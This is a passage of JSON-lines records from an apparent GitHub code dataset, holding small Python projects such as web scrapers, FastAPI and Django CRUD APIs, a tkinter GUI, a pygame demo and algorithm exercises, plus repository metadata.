app.run(debug=True)\r\n","repo_name":"meesala-BFRS01946/engage-dialogflow","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19640934022","text":"import get_names as get\r\nimport urllib.request\r\nimport urllib.parse\r\nimport re\r\nimport pafy\r\nimport youtube_dl\r\nimport collections\r\nimport wikipedia\r\nimport random\r\n\r\nresultStack = collections.deque()\r\nnames = get.get_name_list(\"fleetwood mac\", resultStack)\r\n\r\nsearch = ''\r\n\r\ndef ensure_search(search):\r\n global resultStack\r\n search = ytSearch(resultStack.popleft())\r\n\r\n while not len(search):\r\n search = ytSearch(resultStack.popleft())\r\n \r\n return search\r\n\r\ndef ytSearch(artist):\r\n query_string = urllib.parse.urlencode({\"search_query\" : artist})\r\n html_content = urllib.request.urlopen(\"http://www.youtube.com/results?\" + query_string)\r\n search_results = re.findall(r'href=\\\"\\/watch\\?v=(.{11})', html_content.read().decode())\r\n return search_results\r\n\r\ndef get_video(search):\r\n try:\r\n search = ensure_search(resultStack.popleft())\r\n videoPick = random.randrange(len(search) - 1)\r\n url = \"http://www.youtube.com/watch?v=\" + search[videoPick]\r\n video = pafy.new(url)\r\n except(youtube_dl.utils.DownloadError):\r\n search = ensure_search(resultStack.popleft())\r\n \r\n return video\r\n\r\ndef get_length(time):\r\n time = time.split(\":\")\r\n\r\n timeList = []\r\n timeList.append(int(time[0]))\r\n timeList.append(int(time[1]))\r\n\r\n return (timeList[0] == 0 and timeList[1] < 8)\r\n\r\nfor x in range(2000):\r\n\r\n video = get_video(search)\r\n time = get_length(video.duration)\r\n\r\n while(True):\r\n if video.category == \"Music\" and time:\r\n break\r\n else:\r\n print(\"in music check\")\r\n video = get_video(search)\r\n time = get_length(video.duration)\r\n \r\n best = video.getbestaudio()\r\n\r\n print(video.category)\r\n print(video.duration)\r\n print(video.keywords)\r\n print(best.url)\r\n\r\n get.get_name_list( resultStack.popleft() , resultStack)\r\n\r\n","repo_name":"randyajackson/wikiresearch","sub_path":"wikiresearch.py","file_name":"wikiresearch.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32277060929","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @File: scripts/create_custom_project_from_alyx.py\n# @Author: Niccolo' Bonacchi (@nbonacchi)\n# @Date: Tuesday, August 17th 2021, 5:21:16 pm\nimport iblrig.pybpod_config as pc\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Create custom project, users, and subjects from Alyx\"\n )\n parser.add_argument(\"project_name\", help=\"Name of existing Alyx project\")\n args = parser.parse_args()\n pc.create_custom_project_from_alyx(args.project_name)\n","repo_name":"int-brain-lab/iblrig","sub_path":"scripts/create_custom_project_from_alyx.py","file_name":"create_custom_project_from_alyx.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"3101326375","text":"from pyppeteer import launch\nimport asyncio\n\n\nasync def get_elemets(page):\n\tawait page.waitForSelector(\"#input_text\")\n\n\tinput_text = await page.querySelector(\"#input_text\")\n\n\tsubmit_button = await page.querySelector(\"#submit_button\")\n\n\treturn input_text, submit_button\n\nasync def setup_browser():\n browser = await launch({\"args\":[\"--no-sandbox\",\"--disable-setuid-sandbox\"]})\n page = await browser.newPage()\n\n await page.goto(\"https://bellard.org/textsynth/\")\n\n input_text, submit_button = await get_elemets(page)\n\n return browser, page, input_text, submit_button\n\n\nasync def main():\n\twhile True:\n\t browser, page, input_text, submit_button = await setup_browser()\n\n\t await input_text.type(input(\">\") + \" \")\n\t await submit_button.click()\n\n\t gtext = await page.querySelector(\"#gtext\")\n\t await asyncio.sleep(5)\n\t result = await page.evaluate(\"(element) => element.innerText\",gtext)\n\n\t print(result)\n\n\t await browser.close()\n\n\n\t\n\t\n\n\n\nasyncio.get_event_loop().run_until_complete(main())\n\n\n","repo_name":"annasajkh/TextSynth-Interface","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70625971026","text":"import tkinter as tk # import tkinter\r\nfrom PIL import Image, ImageTk\r\nfrom tkinter import ttk\r\n#from StallD import Display_Stall_Page\r\n\r\nclass StartPage(tk.Frame):\r\n\r\n def __init__(self, parent, controller):\r\n tk.Frame.__init__(self, parent)\r\n # image background\r\n img = ImageTk.PhotoImage(Image.open(\"fcseats.png\"))\r\n panel = tk.Label(self, image=img)\r\n panel.image = img\r\n panel.place(x=0, y=0, relwidth=1, relheight=1)\r\n style = ttk.Style()\r\n # defining a uniform style for button\r\n style.configure(\"MainHeading\", font='Times 24 italic')\r\n style.configure(\"SubHeading.TButton\", font='Helvetica 10')\r\n\r\n # title label on top\r\n TitleLabel= ttk.Label(self, text=\"Welcome to North Spine Food Canteen!\",font='Times 24 italic')\r\n TitleLabel.pack(padx=20, pady=10)\r\n # label for selecting the stall\r\n IntroLabel=tk.Label(self, text=\"Please select the stall\",font='Times 18')\r\n IntroLabel.pack(padx=10, pady=5)\r\n # list for holding names of stall\r\n OPTIONS=[\"Korean Stall\",\"Japanese Stall\",\"Chicken Rice Stall\",\"Miniwok Stall\",\"Malay Stall\"]\r\n self.var=tk.StringVar() # for getting the name of selected stall\r\n self.var.set(OPTIONS[0]) # setting an initial value to the drop down list and the selected stall\r\n # creating a drop down list for the stalls\r\n dropDownList = ttk.OptionMenu(self, self.var, *OPTIONS, style=\"option.TMenubutton\")\r\n dropDownList.pack(padx=10, pady=10)\r\n\r\n # button to the stall display page\r\n NextButton=ttk.Button(self,text=\"Next\", style=\"SubHeading.TButton\", command=lambda :controller.saveStall(self.var))\r\n NextButton.pack(padx=10,pady=10)\r\n # background for window\r\n def resize(self, event):\r\n img = Image.open(\"fcseats.png\").resize(\r\n (event.width, event.height), Image.ANTIALIAS\r\n )\r\n self.img = ImageTk.PhotoImage(img)\r\n self.canvas.itemconfig(self.canvas_img, image=self.img)\r\n","repo_name":"AsthaGarg16/North-Spine-Food-Canteen","sub_path":"StartPage.py","file_name":"StartPage.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13909482752","text":"from typing import Optional\n\nfrom fastapi import FastAPI, Depends, status, Response, HTTPException \n\nimport schemas, models\n\nfrom schemas import Article\nfrom models import ArticleModel\nfrom database import engine, SessionLocal\nfrom sqlalchemy.orm import Session\n\napp = FastAPI()\n\nmodels.Base.metadata.create_all(engine)\n\ndef get_db():\n db = SessionLocal()\n\n try:\n yield db\n finally:\n db.close()\n\n@app.post('/articles', status_code=status.HTTP_201_CREATED)\ndef create_article(article: Article, db: Session = Depends(get_db)):\n article = ArticleModel(title=article.title, body=article.body)\n db.add(article)\n db.commit()\n db.refresh(article)\n return article\n\n@app.get('/articles', status_code=status.HTTP_200_OK)\ndef get_articles(db: Session = Depends(get_db)):\n articles = db.query(ArticleModel).all()\n return articles\n\n@app.get('/articles/{id}', status_code=status.HTTP_200_OK)\ndef get_article(id: int, response: Response, db: Session = Depends(get_db)):\n article = db.query(ArticleModel).filter(ArticleModel.id == id).first()\n if not article:\n response.status_code = status.HTTP_404_NOT_FOUND\n return {\n 'message': f'Article with id {id} not found',\n 'article': None\n }\n return article\n\n@app.put('/articles/{id}')\ndef update_article(id: int, article: Article, db: Session = Depends(get_db)):\n articles = db.query(ArticleModel).filter(ArticleModel.id == id)\n if not articles.first():\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \n detail= f'Article with id {id} not found')\n articles.update(article.dict(), synchronize_session=False)\n db.commit()\n return article\n\n@app.delete('/articles/{id}', status_code=status.HTTP_204_NO_CONTENT)\ndef delete_article(id: int, db: Session = Depends(get_db)):\n articles = db.query(ArticleModel).filter(ArticleModel.id == id)\n if not articles.first():\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \n detail= f'Article with id {id} not found')\n articles.delete(synchronize_session=False)\n db.commit()\n return\n\n\n\n\n","repo_name":"ivanmmarkovic/fastapi-blog","sub_path":"blog-v02-crud/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17609782132","text":"# 面试题22:链表中倒数第k个节点\n\n# 定义链表结构\nclass ListNode():\n def __init__(self, value):\n self.val = value\n self.next = None\n\n# 生成链表\ndef list2linked_list(values):\n # 函数列表转链表\n # 输入列表值,以及想要删除的节点值,输出链表头,和该节点\n if not values:\n return None\n head = ListNode(values[0])\n before_node = head\n for num in values[1:]:\n node = ListNode(num)\n before_node.next = node\n before_node = node\n return head\n\ndef find_kth_to_tal(head, k):\n if not head or k <= 0:\n return None\n pre_node = head\n for _ in range(k):\n if pre_node:\n pre_node = pre_node.next\n else:\n return None\n behind_node = head\n while pre_node:\n behind_node = behind_node.next\n pre_node = pre_node.next\n return behind_node\n\nif __name__ == '__main__':\n k = 4\n values = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']\n head = list2linked_list(values)\n print(find_kth_to_tal(head, k).val)","repo_name":"Real-Chen/Coding-Interviews","sub_path":"22_Kth_node_from_end.py","file_name":"22_Kth_node_from_end.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35621763883","text":"#!/bin/env python3\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.decomposition import PCA\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nsns.set(style=\"ticks\", palette=\"pastel\")\n\n\ndef get_descriptive_plots(entry_data, out=False):\n # Classification var\n X_no_cat = pd.get_dummies(entry_data.drop('type', axis=1))\n\n # Calculate correlation\n corr = X_no_cat.corr()\n\n # Descriptive statistics\n fig, axs = plt.subplots(figsize=(18, 10), nrows=3, ncols=2)\n plt.subplots_adjust(hspace=0.3)\n\n sns.countplot(x=\"type\", data=entry_data, ax=axs[0, 0])\n sns.countplot(y=\"type\", hue=\"color\", data=entry_data, ax=axs[0, 1])\n sns.boxplot(x=\"rotting_flesh\", y=\"type\", data=entry_data, ax=axs[1, 0])\n sns.boxplot(x=\"bone_length\", y=\"type\", data=entry_data, ax=axs[1, 1])\n sns.boxplot(x=\"hair_length\", y=\"type\", data=entry_data, ax=axs[2, 0])\n sns.boxplot(x=\"has_soul\", y=\"type\", data=entry_data, ax=axs[2, 1])\n\n if out:\n plt.savefig('./desc.png')\n print(\"Data description plot saved in desc.png\")\n else:\n plt.show()\n\n fig, axs = plt.subplots(figsize=(18, 10), nrows=1, ncols=2)\n plt.subplots_adjust(hspace=0.3)\n sns.heatmap(corr,\n xticklabels=corr.columns.values,\n yticklabels=corr.columns.values, ax=axs[0])\n pca = PCA().fit(X_no_cat.values)\n sns.lineplot(x=range(len(pca.explained_variance_ratio_)),\n y=np.cumsum(pca.explained_variance_ratio_), ax=axs[1])\\\n .set_xticks(range(len(pca.explained_variance_ratio_)))\n plt.xlabel('Components number')\n plt.ylabel('Cumulative explained variance')\n\n if out:\n plt.savefig('./correlation.png')\n print(\"Correlation plot saved in correlation.png\")\n else:\n plt.show()\n","repo_name":"guilhem-barthes/practical-data-science","sub_path":"creature-predictions/script/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24427474212","text":"import pygame\r\nfrom pygame.sprite import Group\r\n\r\nfrom settings import Settings\r\nimport game_functions as gf\r\n\r\ndef run_game():\r\n # Initialize game and create screen object.\r\n pygame.init()\r\n ai_settings = Settings()\r\n screen = pygame.display.set_mode(\r\n (ai_settings.screen_width, ai_settings.screen_height))\r\n pygame.display.set_caption(\"Raindrop\")\r\n \r\n # Make a group of raindrops\r\n raindrops = Group()\r\n \r\n # Create the grid of raindrops\r\n gf.create_grid(ai_settings, screen, raindrops)\r\n \r\n # Start the main loop for the program\r\n \r\n while True:\r\n gf.check_events(ai_settings, screen)\r\n gf.remove_raindrops(ai_settings, raindrops)\r\n gf.falling_raindrops(ai_settings, raindrops)\r\n gf.update_screen(ai_settings, screen, raindrops)\r\n\r\nrun_game()\r\n\r\n","repo_name":"dansoh/python-intro","sub_path":"python-crash-course/exercises/chapter-13/13-3/raindrops.py","file_name":"raindrops.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73038914065","text":"from django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.parsers import JSONParser\nfrom django.http.response import JsonResponse\n\nfrom MoviesAPP.models import Movie\nfrom MoviesAPP.serializers import MovieSerializer\n\n# Create your views here.\n\n\n@csrf_exempt\ndef movieAPI(request, id=0):\n if request.method == 'GET' and id != 0:\n employee = Movie.objects.get(id=id)\n movie_serializer = MovieSerializer(employee, many=False)\n return JsonResponse(movie_serializer.data, safe=False)\n elif request.method=='GET':\n movies = Movie.objects.all()\n movies_serializer=MovieSerializer(movies,many=True)\n return JsonResponse(movies_serializer.data,safe=False)\n elif request.method=='POST':\n movie_data=JSONParser().parse(request)\n movies_serializer=MovieSerializer(data=movie_data)\n if movies_serializer.is_valid():\n movies_serializer.save()\n return JsonResponse(\"Added Successfully\",safe=False)\n return JsonResponse(\"Failed to Add\",safe=False) \n elif request.method=='PUT':\n movie_data=JSONParser().parse(request)\n movie=Movie.objects.get(movieID=movie_data['movieID'])\n movies_serializer=MovieSerializer(movie, data=movie_data)\n if movies_serializer.is_valid():\n movies_serializer.save()\n return JsonResponse(\"Updated Successfully\",safe=False)\n return JsonResponse(\"Failed to Update\",safe=False) \n elif request.method=='DELETE':\n movie=Movie.objects.get(movieID=id)\n movie.delete()\n return JsonResponse(\"Deleted Successfully\",safe=False)\n","repo_name":"xovnsi/CinemaDGS","sub_path":"CinemaDGS_Project/MoviesAPP/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41161281031","text":"import numpy as np\r\nfrom math import tau\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef coord(pixelarray):\r\n \"\"\"\r\n Calculates the x and y coordinates\r\n :param pixelarray: 2D array with the x and y coordinates\r\n :return: 5D array with x-coord, y-coord, the angles(t_list), range of x-axis and y-axis\r\n \"\"\"\r\n x_coor = [i[0] for i in pixelarray]\r\n y_coor = [i[1] for i in pixelarray]\r\n\r\n t_coor = np.linspace(0, tau, len(x_coor)) # now we can relate f(t) -> x,y\r\n\r\n x_list = x_coor - np.mean(x_coor)\r\n y_list = y_coor - np.mean(y_coor)\r\n for i in range(len(y_list)):\r\n if y_list[i] < 0 or y_list[i] > 0:\r\n y_list[i] = y_list[i] * -1\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n ax.plot(x_list, y_list)\r\n\r\n # later we will need these data to fix the size of figure\r\n xlim_data = plt.xlim()\r\n ylim_data = plt.ylim()\r\n\r\n # plt.show()\r\n lists_coor = np.array((x_list, y_list, t_coor, xlim_data, ylim_data))\r\n return lists_coor\r\n\r\n ##### coord(pixelarray)[0] = x_list\r\n ##### coord(pixelarray)[1] = y_list\r\n ##### coord(pixelarray)[2] = t_list\r\n ##### coord(pixelarray)[3] = x_lim\r\n ##### coord(pixelarray)[4] = y_lim\r\n","repo_name":"JeromeVandeVelde/2DFourier","sub_path":"Coordinates.py","file_name":"Coordinates.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29689071105","text":"import math\n\ndef solution(n):\n answer = 0\n arr = [False for i in range(n)]\n arr[1] = True\n \n for i in range(2,int(math.sqrt(n))+1):\n \n if (arr[i] == True):\n continue\n \n if ((n-1)%i == 0):\n return i\n \n for j in range(i,n,i):\n arr[j] = True\n \n return n-1","repo_name":"SonJinHYo/CodingTest","sub_path":"프로그래머스/lv1/87389. 나머지가 1이 되는 수 찾기/나머지가 1이 되는 수 찾기.py","file_name":"나머지가 1이 되는 수 찾기.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4708265206","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\n\n\nreq = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-20-ianuarie-ora-13-00/')\nlink = BeautifulSoup(req.text, 'html.parser') # col1, col2, col3\n\nreq_21 = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-21-ianuarie-ora-13-00/')\nlink_21 = BeautifulSoup(req_21.text, 'html.parser') # col4 link_21 de la data 21.01....\n\nreq_22 = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-22-ianuarie-ora-13-00/')\nlink_22 = BeautifulSoup(req_22.text, 'html.parser') # col5\n\nreq_23 = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-23-ianuarie-ora-13-00/')\nlink_23 = BeautifulSoup(req_23.text, 'html.parser') # col6\n\nreq_24 = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-24-ianuarie-ora-13-00/')\nlink_24 = BeautifulSoup(req_24.text, 'html.parser') # col7\n\nreq_25 = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-25-ianuarie-ora-13-00/')\nlink_25 = BeautifulSoup(req_25.text, 'html.parser') # col8\n\n\n\ncol1 = []\ncol2 = []\n\ncol3 = []\ncol4 = []\ncol5 = []\ncol6 = []\ncol7 = []\ncol8 = []\n\nhead_ = [] # aici am introdus separat doar \"NR CRT\", \"JUDET\", \"20.01\" ,\"21.01\" etc...\ntotal = [] # cuvantul \"TOTAL\" din site l am \"curatat\" avea scris

 

.. si apenduit la col1\nclean = ''\n\nmatch = link.find_all('tr') # pentru col1, col2, col3\nmatch4 = link_21.find_all('tr') # col4\nmatch5 = link_22.find_all('tr') # col5\nmatch6 = link_23.find_all('tr') # col6\nmatch7 = link_24.find_all('tr') # col7\nmatch8 = link_25.find_all('tr') # col8\n\nmatch2 = link.find_all('table', attrs={'width': '710'}) # pt head_\nfor x in match:\n for y in x.find_all('td', attrs={'width': '47'}):\n col1.append(y.text)\ndel col1[0] # am sters primul index \"NR CRT\" si l am pus in head_ si la fel la restul in continuare....\n\nfor x in match:\n for z in x.find_all('td', attrs={'width': '151'}):\n col2.append(z.text)\ndel col2[0]\n\nfor x in match:\n for z in x.find_all('td', attrs={'width': '189'}):\n col3.append(z.text)\ndel col3[0]\n\nfor x in match4:\n for z in x.find_all('td', attrs={'width': '189'}):\n col4.append(z.text)\ndel col4[0]\n\nfor x in match5:\n for z in x.find_all('td', attrs={'width': '189'}):\n col5.append(z.text)\ndel col5[0]\n\nfor x in match6:\n for z in x.find_all('td', attrs={'width': '189'}):\n col6.append(z.text)\ndel col6[0]\n\nfor x in match7:\n for z in x.find_all('td', attrs={'width': '189'}):\n col7.append(z.text)\ndel col7[0]\n\nfor x in match8:\n for z in x.find_all('td', attrs={'width': '189'}):\n col8.append(z.text)\ndel col8[0]\n\n\nfor x in match2:\n for z in x.find_all('strong'):\n head_.append(z.get_text())\n\nfor x in match2: # \"TOTAL\" curatat si apenduit pe col1\n for z in x.find_all('td', attrs={'width': '198'}):\n total.append(z.get_text())\n\nclean = str(total)\nclean = clean[6:11]\ntotal = clean\ncol1.append(total)\n\nhead_[2] = '20.01' # am introdus manual la pozitiile head_ data si luna corespunzatoare......\nhead_[3] = '21.01' # head_ pana la index[4] avea date am scris peste...am lasat primele 2 \"NR CRT\" si \"JUDET\"\nhead_[4] = '22.01' # head_ din for-ul de mai sus avea 4 index-uri si dupa am appenduit...\nhead_.append('23.01')\nhead_.append('24.01')\nhead_.append('25.01')\n\ndel col5[43] # aici copiaza de pe site caractere garbage pe cele 3 coloane si am sters...\ncol6=col6[0:44]\ncol7=col7[0:44]\n\n\n# aici am reglat lungimea sirurilor sa fie egale , dupa cel mai lung si cele scurte le am umplut cu ' '\n# pt a converti in tabel multidimensional in pandas\nmax_col=int(len(col1)) ,int(len(col2)), int(len(col3)), int(len(col4)),int(len(col5)), int(len(col6)), int(len(col7)), int(len(col8))\nmax_col = max(max_col) # max_col l-am covertit la INT din tuple... sa pot lucra la if...\n\ncount_reglare = 0\nif len(col1) < max_col:\n rez_reglare = (max_col-len(col1))\n for i in range(0,rez_reglare):\n col1.append(' ')\n\nif len(col2) < max_col:\n rez_reglare=(max_col-len(col2))\n for i in range(0,rez_reglare):\n col2.append(' ')\n\nif len(col3) < max_col:\n rez_reglare=(max_col-len(col3))\n for i in range(0,rez_reglare):\n col3.append(' ')\n\nif len(col4) < max_col:\n rez_reglare=(max_col-len(col4))\n for i in range(0,rez_reglare):\n col4.append(' ')\n\nif len(col5) < max_col:\n rez_reglare=(max_col-len(col5))\n for i in range(0,rez_reglare):\n col5.append(' ')\n\nif len(col6) < max_col:\n rez_reglare=(max_col-len(col6))\n for i in range(0,rez_reglare):\n col6.append(' ')\n\nif len(col7) < max_col:\n rez_reglare=(max_col-len(col7))\n for i in range(0,rez_reglare):\n col7.append(' ')\n\nif len(col8) < max_col:\n rez_reglare=(max_col-len(col8))\n for i in range(0,rez_reglare):\n col8.append(' ')\n\n\n\ntitled_column ={ head_[0] : col1, # am introdus datele de tip-ul dictionar pt pandas\n head_[1] : col2,\n head_[2] : col3,\n head_[3] : col4,\n head_[4] : col5,\n head_[5] : col6,\n head_[6] : col7,\n head_[7] : col8,\n }\ndata = pd.DataFrame(titled_column)\nwriter=pd.ExcelWriter('temacovid_.xlsx') # aici am scris si salvat in Excel, am scos index-ul\ndata.to_excel(writer,sheet_name='temaCOVID',index=False)\nwriter.save()\n\n","repo_name":"toni1333/National-Python-11","sub_path":"saptamana5_web-intro/temaCOVID.py","file_name":"temaCOVID.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13810482680","text":"#物品库存系统\nstores={\"apple\":50,\"pear\":60,\"bnana\":90,\"orange\":40,\"lemon\":30}\nprint(\"欢迎登陆物品查询系统!\")\nusername=input(\"请输入用户名:\")\npassword=input(\"请输入密码:\")\nif username!=\"lee\" or password!=\"147258\":\n\tprint(\"您输入的用户名或密码错误!请从新输入:\")\nelse:\n\tprint(\"恭喜您成功登入!\")\n\tmenu=[\"1.查询\",\"2.修改\",\"3.录入\",\"4.删除\",\"5.列表\",\"6.退出\"]\n\tfor i in menu:\n\t print(i)\n\toper=int(input(\"请输入操作数:\"))\n\tif oper==1:\n\t\tname=input(\"请输入物品名:\")\n\t\tif name in stores:\n\t\t\tprint(\"{0}的数量为{1}个\".format(name,stores[name]))\n\t\telse:\n\t\t\tprint(\"此物品暂无!\")\n\tif oper==2:\n\t\tname1=input(\"请输入需要修改的物品名:\")\n\t\tif name1 in stores:\n\t\t\ta=int(input(\"请输入需要修改为:\"))\n\t\t\tstores[name1]=a\n\t\t\tprint(\"{0}修改后,数量为{1}个\".format(name1,stores[name1]))\n\t\telse:\n\t\t\tprint(\"输入的商品错误!\")\n\tif oper==3:\n\t\tname2=input(\"请输入新的物品名:\")\n\t\tstores[name2]=int(input(\"数量为:\"))\n\t\tprint(\"{0},{1}个\".format(name2,stores[name2]))\n\tif oper==4:\n\t\tname3=input(\"请输入需要删除的物品:\")\n\t\tif name3 in stores:\n\t\t\tstores.pop(name3)\n\t\telse:\n\t\t\tprint(\"库存中无此商品!\")\n\tif oper==6:\n\t\tprint(\"您已退出系统!\")\n\tif oper==5:\n\t\tfor k in stores:\n\t\t\tprint(\"{0}的数量为{1}\".format(k,stores[k]))\n\n\t\t\t\n\n\n\n\n\n\n\n \n","repo_name":"lf147258/beautiful-day","sub_path":"store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40540773274","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nNEEDLEMAN-WUNSCH - Global alignment with gaps\n\"\"\"\n# Visualize in matrix form\ndef print_matrix(m):\n for i in range(len(m)):\n value = \"\"\n for j in range(len(m[0])):\n value += str(m[i][j]) + \"\\t\"\n print(value, \"\\n\")\n \ndef global_align(s1, s2, sub_matrix, d):\n \"\"\"\n Calculates the global dynamic programming (scoring) matrix\n \"\"\"\n rows = len(s1) + 1 # num of rows for seq1 and + 1 for f(0,0)\n columns = len(s2) + 1 # num of columns for seq2 and + 1 for f(0,0)\n \n # Init matrix with 0 and dimensions rows * columns\n F = [[0] * columns for x in range(rows)]\n P = [[0] * columns for x in range(rows)]\n \n # Init. rows\n for i in range(rows):\n F[i][0] = d * i\n P[i][0] = 'l'\n # Init. columns\n for j in range(columns):\n F[0][j] = d * j\n P[0][j] = 'u'\n \n # Iteration to fill matrices P and F\n for i in range(1, rows): # Rows\n for j in range(1, columns): # Columns\n # Previous value in the diagonal + gap\n sDiagonal = F[i-1][j-1] + sub_matrix[s1[i-1] + s2[j-1]] \n sColumn = F[i-1][j] + d # Fill columns\n sRow = F[i][j-1] + d # Fill rows\n \n # Get the maximun value\n max_value = max(sDiagonal, sColumn, sRow)\n \n # Add u = up, l = left and d = diagonal in the matrix P\n if max_value == sDiagonal:\n P[i][j] = \"d\"\n elif max_value == sColumn:\n P[i][j] = \"l\"\n else:\n P[i][j] = \"u\"\n \n F[i][j] = max_value\n\n return F,P\n\ndef alignment(s1, s2, F, P):\n # print_matrix(F)\n # print(\"\\n\")\n # print_matrix(P)\n \n \"\"\" \n This function will align the s1 and the s2 using P matrix. \n In the case of matrix F, we wil use to extract the value of the alignment\n \"\"\"\n i = len(P) - 1; j = len(P[0]) -1 # Start from the last position on the matrix\n template = \"\"; target = \"\"; score = F[i][j]\n while i != 0 and j != 0:\n # Use gaps when the movement is to left or up, we are add a gap \"-\". Means no match.\n # Left - Target, Up - Template\n if P[i][j] == \"d\":\n template += s1[i - 1]\n target += s2[j - 1]\n i -= 1\n j -= 1 \n elif P[i][j] == \"l\":\n template += s1[i - 1]\n target += \"-\"\n i -= 1\n j -= 1\n else:\n template += \"-\"\n target += s2[j - 1]\n i -= 1\n j -= 1\n # Reverse template and target \n template = template[::-1]\n target = target[::-1]\n print(template)\n print(target)\n print(score)\n\nif __name__ == \"__main__\":\n # Sequences without gaps\n s1 = \"ACCCA\" # Rows\n s2 = \"ACT\" # Columns\n d = -2\n \n sub_matrix = {\"AA\": 2, \"AC\": -1, \"AT\": -1, \"AG\": 0,\n \"CA\": -1, \"CC\": 2, \"CT\": 0, \"CG\": -1,\n \"TA\": -1, \"TC\":0, \"TT\": 2, \"TG\": -1,\n \"GA\": 0, \"GC\": -1, \"GT\": -1, \"GG\": 2} \n\n F, P = global_align(s1, s2, sub_matrix, d)\n alignment(s1, s2, F, P)","repo_name":"naiaralandeta/programming_naiara_landeta","sub_path":"exercise/NW.py","file_name":"NW.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30652395146","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom task import get_coin_price\n\n\nclass TestTask(TestCase):\n\n @patch(\"task.get_coin_id\", lambda coin_code: -1)\n def test_get_coin_price_no_coin_data(self):\n coin_price = get_coin_price(\"btc\", \"uah\")\n\n self.assertEqual(coin_price, \"There is no data for coin with the 'btc' code\")\n\n @patch(\"task.get_coin_data\", lambda coin_code: {\"market_data\": {\"current_price\": {}}})\n def test_get_coin_price_no_currency_data(self):\n coin_price = get_coin_price(\"btc\", \"uah\")\n\n self.assertEqual(coin_price, \"There is no price data for currency with the 'uah' code\")\n\n @patch(\"task.get_coin_data\", lambda coin_code: {\"market_data\": {\"current_price\": {\"uah\": 10350000}}})\n def test_get_coin_price(self):\n coin_price = get_coin_price(\"btc\", \"uah\")\n\n self.assertEqual(coin_price, 10350000)\n","repo_name":"radik1999/Test_task","sub_path":"test_task.py","file_name":"test_task.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31080906695","text":"from sortedcontainers import SortedList\n\nclass Solution:\n def numberOfPairs(self, nums1: List[int], nums2: List[int], diff: int) -> int:\n arr = SortedList()\n count = 0\n \n for num1,num2 in zip(nums1,nums2):\n count+=arr.bisect_right(num1-num2+diff)\n arr.add(num1-num2)\n \n return count","repo_name":"Merwan-J/competetive-programming","sub_path":"2426-number-of-pairs-satisfying-inequality/2426-number-of-pairs-satisfying-inequality.py","file_name":"2426-number-of-pairs-satisfying-inequality.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41668695650","text":"\ndef loadListIntoDictonary(list):\n dictonary = {}\n for word in list:\n if word in dictonary:\n dictonary[word] += 1\n else:\n dictonary[word] = 1\n return dictonary\n\ndef checkMagazine(magazine, note):\n magazineDictonary = loadListIntoDictonary(magazine)\n noteDictonary = loadListIntoDictonary(note)\n for word in noteDictonary:\n if not word in magazineDictonary:\n return \"No\"\n if noteDictonary[word] > 